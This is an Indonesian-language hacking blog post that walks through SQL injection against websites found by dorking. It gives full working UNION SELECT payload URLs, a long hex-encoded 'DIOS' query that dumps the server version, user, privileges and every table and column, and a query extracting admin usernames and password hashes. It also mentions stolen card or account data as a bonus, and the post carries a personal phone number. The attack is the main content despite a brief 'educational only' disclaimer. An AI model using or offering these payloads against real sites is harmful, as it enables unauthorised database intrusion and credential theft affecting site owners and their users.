loading...
Tutorial SQL injection

Tutorial SQL injection



Halo guyss balik lagi sama gua Bull.4TX
Kali ini ada yg request, tentang SQL injection padahal gua udh bikinin sebelumnya tapi kali aja masih ada yg blom ngerti oke gua bikinin

Langsung aja apa itu SQL injection?

SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar

SQL Injection selalu menjadi teknik penyerangan terfavorit sebagian besar hacker dari tahun ke tahun, disamping karena semakin sulitnya hacker melakukan serangan melalui jaringan yang disebabkan oleh semakin canggihnya perangkat-perangkat pertahanan dari target (contoh: firewall, IDS, UTM, dll), SQL Injection juga sangat mudah dilakukan karena masih banyak web programmer yang masih kurang “aware” terhadapnya...kurang lebih seperti itu

Oke Pertama siapin dulu bahan”nya

~ Hp
~ Kuota internet
~ Dorking
~ AnonHackbar

Bang Kenapa anonhackbar? Karna gua suka pake apk itu kalo lagi SQLi
Oke langsung aja...


Oke disitu kita bisa liat prameter nya id
Sebernanya gk harus id juga si prameter nya

Oke pertama kasih tanda ' itu biar kita tau vulnerability tidak terhadap SQLi
Kalo vuln bakal blank kek gini

Sebelum dikasih '


Sesudah dikasih '


Nah kalo kek gitu berarti vulnerability
Langsung aja kita order oke...




Karna disini lama jadi gua percepat aja oke...

Disini web target gua blank di 26 berarti column web nya yaitu 25
Jadi langsung aja kita union select

https://site.com/packages-details.php?id=18'Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -&cat_id=

Nah disini web gua GK keluar angka nya
Harus gimana bang?
Tinggal lu tambahin tanda - atau . Di depan prameter id

https://site.com/packages-details.php?id=-18'Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -&cat_id=

Keluar kan? Atau GK keluar? Nanti gua kasih tau teknik nya :) kalo ada yg request
Disini yg keluar angka ajaib nya yaitu



Oke langsung kita kasih Dios nya aja biar GK lama 
Ini pake Dios bikin w :v

CONCAT(0x3c696d67207372633d2268747470733a2f2f692e6962622e636f2f4c3053676771342f506963732d4172742d30322d30382d30332d34372d33352e706e67222077696474683d22323530707822206865696768743d223330307078223e3c62723e3c62723e3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a32307078223e282b2920496e6a656374656420427920446176696420282b293c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d333e3c62723e3c666f6e7420666163653d224963656c616e64222073697a653d22312220636f6c6f723d22626c75656461726b223e416b75206d656e63696e74616920446961206b61726e6120416c6c6168203a292061776173206a616e67616e206d656e6174617020646961207465726c616c75206c616d612c206469612075646168206164612079616e672070756e79612042616d62616e673c2f666f6e743e,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),0x3c62723e,0x4f757466696c65203a3a20,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a))

Langsung kita taro di angka ajaib nya..

https://site.com/packages-details.php?id=-18'Union Select 1,CONCAT(0x3c696d67207372633d2268747470733a2f2f692e6962622e636f2f4c3053676771342f506963732d4172742d30322d30382d30332d34372d33352e706e67222077696474683d22323530707822206865696768743d223330307078223e3c62723e3c62723e3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a32307078223e282b2920496e6a656374656420427920446176696420282b293c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d333e3c62723e3c666f6e7420666163653d224963656c616e64222073697a653d22312220636f6c6f723d22626c75656461726b223e416b75206d656e63696e74616920446961206b61726e6120416c6c6168203a292061776173206a616e67616e206d656e6174617020646961207465726c616c75206c616d612c206469612075646168206164612079616e672070756e79612042616d62616e673c2f666f6e743e,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),0x3c62723e,0x4f757466696c65203a3a20,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),0x3c62723e,(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -&cat_id=

Nah abis itu lu cari dah user's name ama password admin nya...kalo lu lagi beruntung lu,
Lu bakal dapet CC/ACC itu kalo beruntung :v

Abis itu kita dump user's admin nya

(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x)

https://site.com/packages-details.php?id=-18'Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -&cat_id=


Nah udah gitu, tinggal hash :v mudahkan?

Oke sekian dulu dari gua kalo ada yg mau di tanyain bisa chat gua..

WhatsApp 081617209368

NB : kalo website nya pas di kasih union select/Dios forbidden berarti web nya pake firewall...gimana caranya? Harus kita Bypass salah satunya...

#konten ini hanya untuk pembelajaran(pengetahuan semata)
#mohon untuk tidak melakukannya, kami tidak bertanggung jawab atas
tindakan hacking apapun yang kalian lakukan...!!

#Bull.4TX

Berlangganan update artikel terbaru via email:

0 Response to "Tutorial SQL injection"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel